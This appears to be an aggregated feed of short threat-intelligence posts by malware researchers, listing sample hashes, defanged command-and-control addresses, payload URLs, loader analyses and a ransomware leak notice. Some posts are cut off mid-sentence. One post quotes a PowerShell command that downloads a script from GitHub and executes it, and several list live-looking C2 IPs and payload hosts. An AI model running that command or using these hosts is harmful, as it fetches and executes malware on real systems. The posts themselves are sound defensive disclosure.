btw I presented a research about how we used images and other artifacts to track threat actors like in this thread. We presented this at Botconf and FIRST CTI Summit :)

slides: botconf.eu/wp-content/upl…
video: youtube.com/watch?v=uljCsK…

🚨Advanced Infrastructure Query Guide - How To Track APT Sidewinder Domains

New blog! Showing you step-by-step through the process of building and refining threat intel queries for APT Sidewinder infrastructure.

embeeresearch.io/advanced-guide…

#APT #malware

🔎 'software.img': 4f7650a2b698db4c95e4ff0f4b6781c9c8f6d00c810892aebbd5b5c54a34b2da

Next stage: https://jlmin[.]cc/logs.txt?id=NTE5 🤔

🚩 'sysvol.lnk': c5d8519d915921c1c558b98751b423f4ef544961ee3bddd50354dfbeaeca82a6

#LNK → #GitHub → #CobaltStrike 🔎
C2: 138.68.79.95:4545 (Watermark 987654321)

'powershell.exe -WindowStyle Hidden -Command 'IEX (IWR 'https://github[.]com/owiwan/thecrom/raw/main/kk.ps1'

#SolarMaker trojan installs a backdoor
#Signed #ImposterCertificate

Decoy: 'The code execution cannot proceed because MSVCR120.dll was not found. Reinstalling the program may fix this problem'

C2: 2.58.15.118
VT: virustotal.com/gui/file/9fcdb…

MB: bazaar.abuse.ch/sample/c8d6799…

I created a config extractor for the new version (v6) of #DarkGate malware:

github.com/leandrofroes/m…

#malwareanalysis

🚩 Interesting 'aimx_loader.exe': b984271b262c6b99ce0f3189f988ccbb76975a9c06755af295b971313eb1d74579

Next step from: https://files[.]catbox[.]moe/8le20h.bin

It uses a vulnerable GIGABYTE driver (gdrv. sys) commonly used in BYOVD attacks to escalate privileges.

Then, load the

🚨Actualización:

#Chile 🇨🇱: El grupo de ransomware cactus vuelca los datos de la Empresa ACFIN SA, (acfin[.]cl).

#ransomware #cactus #Darkweb #breach

+
The saga to revoke EV stealer certificate continues:

'Reviihuray Communication Technology Co., Ltd.'

MSI + Payload decoded: bazaar.abuse.ch/sample/33eb19b…

Recent #systembc #malware active victim IP list around the world 👇

A server on Discord that is distributing something called 'Xylex Executor' (supposed Roblox Byfron Bypass) caught my attention, however, I checked in detail the hash (shared by the admin) and it turns out that it leads to #ExelaStealer 😏

The final payload is downloaded from

0044d6cf5c33ac9d1accef9f815add6cff3057d29680d9f7ed055b0d49534f41
From these:
6cc36fe3adca4f675d1f35cd59fb29b43397e6ca524ef161ffebb0361a1c39b9
c27795207ea90d0c8491e7eb08c418758571b8f7ba86dbb649c21bdd969d1f95
f7a4a5514276d31e8438821d63dde38b45b1d50cafee427083dd7e03d7041ac3
Germán Fernández

Interesting threat observed:

counter: hxxps://samorai-3e912-default-rtdb.firebaseio[.]com/user.json

pdb: C:\Users\La Brea\Music\REMOTAS\Injectors\C++\Dll1\Release\msedge_elf.pdb

payload: hxxps://sup-docul[.]life/JOSEDAGOIABA/TANK.rar

Germán Fernández

🦔 📹 New Video: D3fack loader analysis

➡️ Inno Setup pascal script analysis
➡️ string deobfuscation with binary refinery
➡️ JPHP decompilation

Sample was first described by RussianPanda 🐼 🇺🇦

youtube.com/watch?v=y09Zre…
#MalwareAnalysisForHedgehogs #D3fackLoader

'CHAPURANSOM'
🤔
Germán Fernández